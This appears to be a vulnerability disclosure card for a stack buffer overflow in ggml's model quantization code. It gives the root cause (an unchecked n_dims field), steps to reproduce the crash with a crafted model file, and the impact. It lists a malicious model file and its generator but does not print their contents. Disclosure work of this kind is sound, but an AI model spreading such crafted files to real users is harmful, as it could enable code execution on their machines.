YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
GGML common-ggml.cpp โ Stack Buffer Overflow (CWE-121)
A crafted 255-byte model file causes a stack buffer overflow in gpt-2-quantize / gpt-j-quantize with attacker-controlled data, enabling potential code execution.
Vulnerability
File: examples/common-ggml.cpp:113-116 in ggml_common_quantize_0()
Root Cause: n_dims is read from the model file with no bounds check, then used to index int32_t ne[4]. Setting n_dims > 4 writes attacker-controlled data past the 16-byte stack array.
Reproduction
# Generate the malicious model file
python3 gen_stack_overflow_v2.py
# Build ggml with AddressSanitizer
git clone https://github.com/ggerganov/ggml && cd ggml
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
make -j4 gpt-2-quantize
# Trigger crash
./bin/gpt-2-quantize malicious_gpt2_v2.bin output.bin q4_0
# Result: Segmentation fault (without ASan) / ASan: stack-buffer-overflow (with ASan)
Files
| File | Description |
|---|---|
malicious_gpt2_v2.bin |
255-byte malicious GPT-2 model file (n_dims=32) |
gen_stack_overflow_v2.py |
Python generator script |
Impact
Stack buffer overflow with attacker-controlled data. Overwrites saved registers, return address, and adjacent stack variables in ggml_common_quantize_0(). Potential for arbitrary code execution when a user quantizes a malicious model file.
Tested Version
ggml 0.11.0 (commit ac6f7b44f60fde0091f0b3d99afde48f8c99b13a)